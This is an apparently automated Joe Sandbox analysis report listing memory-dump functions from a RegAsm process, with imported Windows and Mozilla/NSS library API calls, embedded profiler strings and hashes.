ntdll.dll, xrefs: 6C7596E3
Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6C759670
MapViewOfFileNuma2, xrefs: 6C7597B1
NtMapViewOfSection, xrefs: 6C759701

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 409848716-3880535382
Opcode ID: ab53bddb1f93ecb108db995f623b1fa4e7e5c0ab5b29bcc359ea42be3077fe93
Instruction ID: 62f78846b7a03a82da4ed167d62d10adb1810063718cd8a9416adedbe0f1e070
Opcode Fuzzy Hash: ab53bddb1f93ecb108db995f623b1fa4e7e5c0ab5b29bcc359ea42be3077fe93
Instruction Fuzzy Hash: B1417EB570060A9FDF00CFB5DA88A9677B4EB49724F808539ED1997740DB30EA25CBA1

Function 6C884CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,?,6C88AB7F,?,00000000,?), ref: 6C884CB4
EnterCriticalSection.KERNEL32(0000001C,?,6C88AB7F,?,00000000,?), ref: 6C884CC8
TlsGetValue.KERNEL32(?,6C88AB7F,?,00000000,?), ref: 6C884CE0
EnterCriticalSection.KERNEL32(?,?,6C88AB7F,?,00000000,?), ref: 6C884CF4
PL_HashTableLookup.NSS3(?,?,?,6C88AB7F,?,00000000,?), ref: 6C884D03
PR_Unlock.NSS3(?,00000000,?), ref: 6C884D10

Part of subcall function 6C90DD70: TlsGetValue.KERNEL32 ref: 6C90DD8C
Part of subcall function 6C90DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C90DDB4

PR_Now.NSS3(?,00000000,?), ref: 6C884D26

Part of subcall function 6C929DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C970A27), ref: 6C929DC6
Part of subcall function 6C929DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C970A27), ref: 6C929DD1
Part of subcall function 6C929DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C929DED

PR_Unlock.NSS3(?,?,00000000,?), ref: 6C884D98
PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C884DDA
PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C884E02

Memory Dump Source

Source File: 00000003.00000002.2272879099.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true

Associated: 00000003.00000002.2271733381.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2291783107.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292436423.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292519358.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292589475.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292635391.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c7e0000_RegAsm.jbxd

Similarity

API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4032354334-0
Opcode ID: f5df38abe5f83c7b7bf7d81147c706790b3625842e8238d7cbf77024a2f4637a
Instruction ID: d459af512c8c6733a46c8cc526fde26cbb0f37d1771b93161243abab77ad5d79
Opcode Fuzzy Hash: f5df38abe5f83c7b7bf7d81147c706790b3625842e8238d7cbf77024a2f4637a
Instruction Fuzzy Hash: 4541C7B7A00205ABDB219F28E95096A77BCEF95219F154970EC0887F12FB31E954C7A1

Function 6C78DBB0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 207threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C78945E
Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789470
Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789482
Part of subcall function 6C789420: __Init_thread_footer.LIBCMT ref: 6C78949F

GetCurrentThreadId.KERNEL32 ref: 6C78DBE1
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C78DBE9

Part of subcall function 6C7894D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7894EE
Part of subcall function 6C7894D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C789508

??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6C78DC5D
moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6C78DC7F

Part of subcall function 6C75CA10: malloc.MOZGLUE(?), ref: 6C75CA26

Part of subcall function 6C789A60: GetCurrentThreadId.KERNEL32 ref: 6C789A95
Part of subcall function 6C789A60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C789A9D
Part of subcall function 6C789A60: ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C789ACC
Part of subcall function 6C789A60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C789BA7
Part of subcall function 6C789A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C789BB8
Part of subcall function 6C789A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C789BC9

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C78DD1B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C78DD44
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C78DD58

Part of subcall function 6C77CBE8: GetCurrentProcess.KERNEL32(?,6C7431A7), ref: 6C77CBF1
Part of subcall function 6C77CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7431A7), ref: 6C77CBFA

Strings

[I %d/%d] locked_profiler_save_profile_to_file(%s), xrefs: 6C78DBF2

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CurrentTimefreegetenv$ProcessStampThreadV01@@Value@mozilla@@_getpid$??1ios_base@std@@?profiler_time@baseprofiler@mozilla@@Init_thread_footerNow@Stamp@mozilla@@TerminateV12@___acrt_iob_func__stdio_common_vfprintfmallocmoz_xmalloc
String ID: [I %d/%d] locked_profiler_save_profile_to_file(%s)
API String ID: 1056184932-1387374313
Opcode ID: 0b8a4b4b854aaab6e542e31be1e742651b50bd09f6460e4c41017b6da81898bb
Instruction ID: aaf877cf4e4bbcba191a99550a71624d6d24e88a8f3d8a1947b0b45d54746ccb
Opcode Fuzzy Hash: 0b8a4b4b854aaab6e542e31be1e742651b50bd09f6460e4c41017b6da81898bb
Instruction Fuzzy Hash: 5E81F0746017018FCB24DF25C688AAAB7F1BF99308F50893ED95A87B51DB30F909CB91

Function 6C790000 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 127threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C78945E
Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789470
Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789482
Part of subcall function 6C789420: __Init_thread_footer.LIBCMT ref: 6C78949F

GetCurrentThreadId.KERNEL32 ref: 6C790039
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C790041
GetCurrentThreadId.KERNEL32 ref: 6C790075
AcquireSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C790082
moz_xmalloc.MOZGLUE(00000048), ref: 6C790090
free.MOZGLUE(?), ref: 6C790104
ReleaseSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C79011B

Strings

[D %d/%d] profiler_register_page(%llu, %llu, %s, %llu), xrefs: 6C79005B

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease_getpidfreemoz_xmalloc
String ID: [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu)
API String ID: 3012294017-637075127
Opcode ID: b5508a3d4077127fd8d91f6d325288b7d9207b558800cb93e58df3a71e73930f
Instruction ID: 9ffd4dd74522f85562e2f675134482b81d641355d307e6cdc40042a8e5ffc894
Opcode Fuzzy Hash: b5508a3d4077127fd8d91f6d325288b7d9207b558800cb93e58df3a71e73930f
Instruction Fuzzy Hash: AD41BD756006459FCB10CF68D948A9ABBF0FF49318F50452EED5A87B50D731BA04CBA2

Function 6C757E90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 116stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C757EA7
malloc.MOZGLUE(00000001), ref: 6C757EB3

Part of subcall function 6C75CAB0: EnterCriticalSection.KERNEL32(?), ref: 6C75CB49
Part of subcall function 6C75CAB0: LeaveCriticalSection.KERNEL32(?), ref: 6C75CBB6

strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C757EC4
mozalloc_abort.MOZGLUE(?), ref: 6C757F19
malloc.MOZGLUE(?), ref: 6C757F36
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C757F4D

Strings

d, xrefs: 6C757F89

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
String ID: d
API String ID: 204725295-2564639436
Opcode ID: db3e8cf2fc0f76a0d06e667633e6d33d14cbe27169aead833049496b03666727
Instruction ID: 9bbf3766aec25efbc3e3505f40eefb576d50885ce3c19b2619d3e51d5d08b39d
Opcode Fuzzy Hash: db3e8cf2fc0f76a0d06e667633e6d33d14cbe27169aead833049496b03666727
Instruction Fuzzy Hash: 24311A61E007899BDB01DF68CD499FEB778EF95208F449238DC4997612FB31AAD4C394

Function 6C7AAAB0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6C7CE220,?), ref: 6C7ABC2D
ReleaseSRWLockExclusive.KERNEL32(6C7CE220), ref: 6C7ABC42
RtlFreeHeap.NTDLL(?,00000000,6C7BE300), ref: 6C7ABC82
RtlFreeUnicodeString.NTDLL(6C7CE210), ref: 6C7ABC91
RtlFreeUnicodeString.NTDLL(6C7CE208), ref: 6C7ABCA3
RtlFreeHeap.NTDLL(?,00000000,6C7CE21C), ref: 6C7ABCD2
free.MOZGLUE(?), ref: 6C7ABCD8

Strings

,|l, xrefs: 6C7AAABA

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
String ID: ,|l
API String ID: 3047341122-607198438
Opcode ID: 7ac3148d56b490d1cebea8ffabca2957091160d6c099edbff7901f0485a19245
Instruction ID: 9574689aae14d058fd4043926d8dc595c3465f90a2b835ae4c8d39ca29d0cb8b
Opcode Fuzzy Hash: 7ac3148d56b490d1cebea8ffabca2957091160d6c099edbff7901f0485a19245
Instruction Fuzzy Hash: B621E172600719EFE7209F86CA84F66B7A9FF41718F148429E8196BA11CB31F846CBD1

Function 6C754C00 Relevance: 13.9, APIs: 8, Strings: 1, Instructions: 421COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C7CE7DC), ref: 6C754C2F
LeaveCriticalSection.KERNEL32(6C7CE7DC), ref: 6C754C82
EnterCriticalSection.KERNEL32(6C7CE7DC), ref: 6C754C89

Strings

MOZ_RELEASE_ASSERT(mNode), xrefs: 6C7550F3, 6C755121, 6C75513C

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CriticalSection$Enter$Leave
String ID: MOZ_RELEASE_ASSERT(mNode)
API String ID: 2801635615-1351931279
Opcode ID: fa42908185007601dddfb36ab246c938a11ff9ee35da7f2e4613a712c26a5af3
Instruction ID: 1bd31c5b6a0c70b990147a7f3f26a5e0f7a36f68bb00153132addc282fc7d586
Opcode Fuzzy Hash: fa42908185007601dddfb36ab246c938a11ff9ee35da7f2e4613a712c26a5af3
Instruction Fuzzy Hash: 84F1D0317057028FD718CF29C695715BBE1AF86728F68C66CE56A8BAD4CF31D821CB81

Function 6C753E80 Relevance: 13.7, APIs: 9, Instructions: 246memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,?,?,?,?,?,6C753CCC), ref: 6C753EEE
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C753FDC
RtlAllocateHeap.NTDLL(?,00000000,00000040,?,?,?,?,?,6C753CCC), ref: 6C754006
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C7540A1
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C753CCC), ref: 6C7540AF
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C753CCC), ref: 6C7540C2
RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 6C754134
RtlFreeUnicodeString.NTDLL(?,?,00000000,00000000,?,00000000,00000040,?,?,?,?,?,6C753CCC), ref: 6C754143
RtlFreeUnicodeString.NTDLL(?,?,?,00000000,00000000,?,00000000,00000040,?,?,?,?,?,6C753CCC), ref: 6C754157

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Free$Heap$StringUnicode$Allocate
String ID:
API String ID: 3680524765-0
Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction ID: b38e74ee5e60b55ebff408378d10606508341979afb1f291be998297079c5746
Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction Fuzzy Hash: 36A192B1A00215CFDB40CF28CA80659B7F5FF48318F6545A9D909AF752DB72E866CFA0

Function 6C742030 Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 204memoryCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,6C763F47,?,?,?,6C763F47,6C761A70,?), ref: 6C74207F
memset.VCRUNTIME140(?,000000E5,6C763F47,?,6C763F47,6C761A70,?), ref: 6C7420DD
VirtualFree.KERNEL32(00100000,00100000,00004000,?,6C763F47,6C761A70,?), ref: 6C74211A
EnterCriticalSection.KERNEL32(6C7CE744,?,6C763F47,6C761A70,?), ref: 6C742145
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004,?,6C763F47,6C761A70,?), ref: 6C7421BA
EnterCriticalSection.KERNEL32(6C7CE744,?,6C763F47,6C761A70,?), ref: 6C7421E0
LeaveCriticalSection.KERNEL32(6C7CE744,?,6C763F47,6C761A70,?), ref: 6C742232

Strings

MOZ_RELEASE_ASSERT(node->mArena == this), xrefs: 6C742253, 6C742268
MOZ_CRASH(), xrefs: 6C74227D

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterVirtual$AllocFreeLeavememcpymemset
String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(node->mArena == this)
API String ID: 889484744-884734703
Opcode ID: 2cf6333c704344f0db0de9312a8cd2d58031b4afd6b6d2c53a794c9c5f5bc1c4
Instruction ID: 7e8d0d88501adc6be23b37049549ff2c52cd02d2b9049dc6df8a0701cedf94d2
Opcode Fuzzy Hash: 2cf6333c704344f0db0de9312a8cd2d58031b4afd6b6d2c53a794c9c5f5bc1c4
Instruction Fuzzy Hash: 5261C431F0021A8FCB04CE79CA8DB6E76B5AF95358F258139E524E7A94D7709D20CB91

Function 6C799D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C798273), ref: 6C799D65
free.MOZGLUE(6C798273,?), ref: 6C799D7C
free.MOZGLUE(?,?), ref: 6C799D92
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C799E0F
free.MOZGLUE(6C79946B,?,?), ref: 6C799E24
free.MOZGLUE(?,?,?), ref: 6C799E3A
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C799EC8
free.MOZGLUE(6C79946B,?,?,?), ref: 6C799EDF
free.MOZGLUE(?,?,?,?), ref: 6C799EF5

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: b638d0a00c5cf8cbeb7dbac3baa6c4e024444677eaf7692f78d2674cb2b39943
Instruction ID: 4831c9049824214f29a899658051dd5cbca701a83ccde165b93ba4914d54dda6
Opcode Fuzzy Hash: b638d0a00c5cf8cbeb7dbac3baa6c4e024444677eaf7692f78d2674cb2b39943
Instruction Fuzzy Hash: 52718D71909B418FD712CF19D68055AF3F8FFA9315B448629EC5E5BB12EB30E885CB81

Function 6C79DDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,00000000,?,6C78DEFD), ref: 6C79DDCF

Part of subcall function 6C77FA00: ReleaseSRWLockExclusive.KERNEL32(?,?,6C755407), ref: 6C77FA4B

Part of subcall function 6C7990E0: free.MOZGLUE(00000000,00000000,00000000,?,6C79B6F6,?,?,?,?,?,6C79B127), ref: 6C7990FF
Part of subcall function 6C7990E0: free.MOZGLUE(?,00000000,00000000,?,6C79B6F6,?,?,?,?,?,6C79B127), ref: 6C799108

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,00000000,?,6C78DEFD), ref: 6C79DE0D
free.MOZGLUE(00000000,?,?,00000000,00000000,?,6C78DEFD), ref: 6C79DE41
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,00000000,?,6C78DEFD), ref: 6C79DE5F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,00000000,?,6C78DEFD), ref: 6C79DEA3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,00000000,?,6C78DEFD), ref: 6C79DEE9
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C78DEFD), ref: 6C79DF32

Part of subcall function 6C79DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?,?,00000000,?,?,?,6C79DF7F,?,?,00000000,00000000,?,6C78DEFD), ref: 6C79DB86
Part of subcall function 6C79DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?,?,?,?,00000000,?,?,?,6C79DF7F,?,?,00000000,00000000), ref: 6C79DC0E

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C78DEFD), ref: 6C79DF65
free.MOZGLUE(?,?,?,00000000,00000000,?,6C78DEFD), ref: 6C79DF80

Part of subcall function 6C765E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C765EDB
Part of subcall function 6C765E90: memset.VCRUNTIME140(ewzl,000000E5,?), ref: 6C765F27
Part of subcall function 6C765E90: LeaveCriticalSection.KERNEL32(?), ref: 6C765FB2

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
String ID:
API String ID: 112305417-0
Opcode ID: 87f143f8e32eac4fb45f513c3d6a07b68ddbf04af3f8a8d700a45e7392625955
Instruction ID: ed9141c2c7e162911b2dd42bde3a66991eabb09b844f8533cf5896b30a9be442
Opcode Fuzzy Hash: 87f143f8e32eac4fb45f513c3d6a07b68ddbf04af3f8a8d700a45e7392625955
Instruction Fuzzy Hash: 9551D6766016019FD711CB29EA846AEB37BBFA1308F95012CD81A53F01D731F95ACB9A

Function 6C79AB90 Relevance: 13.6, APIs: 9, Instructions: 135threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C79ABB4
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C79ABC0
ReleaseSRWLockExclusive.KERNEL32 ref: 6C79AC06
GetCurrentThreadId.KERNEL32 ref: 6C79AC16
AcquireSRWLockExclusive.KERNEL32(00000000), ref: 6C79AC27
ReleaseSRWLockExclusive.KERNEL32 ref: 6C79AC66
free.MOZGLUE(?), ref: 6C79AD19
free.MOZGLUE(00000000), ref: 6C79AD2B
?_Xbad_function_call@std@@YAXXZ.MSVCP140(00000000), ref: 6C79AD38

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree$Xbad_function_call@std@@
String ID:
API String ID: 2167474191-0
Opcode ID: 832ea7a52b65b0e07d37412fcdb7ce35012fa1d348ffb7dd679ca790b78ca208
Instruction ID: cb09489a7cc9825ae028f70ad557df45254f459a62c3c94355038a38f90af695
Opcode Fuzzy Hash: 832ea7a52b65b0e07d37412fcdb7ce35012fa1d348ffb7dd679ca790b78ca208
Instruction Fuzzy Hash: 01515A74A01B058FC724DF25C58876AB7F5FF89724F204A2DE8AA87B50EB30B844CB41

Function 6C79CB30 Relevance: 13.6, APIs: 9, Instructions: 129COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPAU_iobuf@@PBDHH@Z.MSVCP140(?,00000002,00000040,?,?,6C79BCAE,?,?,6C78DC2C), ref: 6C79CB52
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,?,6C79BCAE,?,?,6C78DC2C), ref: 6C79CB82
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,?,6C79BCAE,?,?,6C78DC2C), ref: 6C79CB8D
